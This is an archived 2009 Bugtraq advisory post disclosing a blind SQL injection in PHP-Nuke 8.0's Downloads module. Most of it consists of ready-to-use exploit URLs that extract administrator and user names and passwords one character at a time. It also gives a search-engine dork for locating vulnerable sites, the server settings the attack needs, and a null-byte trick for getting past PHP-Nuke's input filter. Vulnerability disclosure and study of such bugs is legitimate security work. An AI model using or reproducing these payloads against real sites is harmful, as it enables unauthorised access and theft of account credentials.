lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <200901231045.n0NAjYLY030790@www3.securityfocus.com>
Date: Fri, 23 Jan 2009 03:45:34 -0700
From: r3d.w0rm@...oo.com
To: bugtraq@...urityfocus.com
Subject: PHP-Nuke 8.0 Downloads Blind Sql Injection

#####################################################################################
####               PHP-Nuke 8.0 Downloads Blind Sql Injection                    ####
#####################################################################################
#                                                                                   #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                                #
#Discovered by : Sina Yazdanmehr (R3d.W0rm)                                         #
#Our Site : http://ircrash.com                                                      #
#My Official WebSite : http://r3dw0rm.ir                                            #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr)            #
#####################################################################################
#                                                                                   #
#Download : http://phpnuke.org                                                      #
#                                                                                   #
#Dork : inurl:modules.php?name=Downloads "PHP-Nuke"                                 #
#                                                                                   #
#####################################################################################
#                                      [Bug]                                        #
#                                                                                   #
#Admin Username : http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker@...il.net&&url=0%2F*%00*/'%20OR%20ascii(substring((select+aid+from+nuke_authors+limit+0,1),1,1))=ascii_code_try%2F*
#Admin Password : http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker@...il.net&&url=0%2F*%00*/'%20OR%20ascii(substring((select+pwd+from+nuke_authors+limit+0,1),1,1))=ascii_code_try%2F*                                    
#Users Username : http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker@...il.net&&url=0%2F*%00*/'%20OR%20ascii(substring((select+username+from+nuke_users+limit+0,1),1,1))=ascii_code_try%2F*                                   
#Users Password : http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker@...il.net&&url=0%2F*%00*/'%20OR%20ascii(substring((select+user_password+from+nuke_users+limit+0,1),1,1))=ascii_code_try%2F*                                    
#                                                                                   #
#####################################################################################
#                                      [Note]                                       #
#                                                                                   #
#1. magic_quotes_gpc = Off                                                          #
#2. register_globals = On                                                           #
#3. For using bug you must login via a simple user.                                 #
#4. After using bug go to this url :                                                #
#http://[site]/[path]/modules.php?name=Downloads&d_op=Add&email=attacker@...il.net&title=zz&url=zz&description=zz
#5. I use ascii codes and null byte in url for bypass nuke security function        #
#   please don't change ascii code and %00.                                         #
#                                                                                   #
###################################### TNX GOD ######################################

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ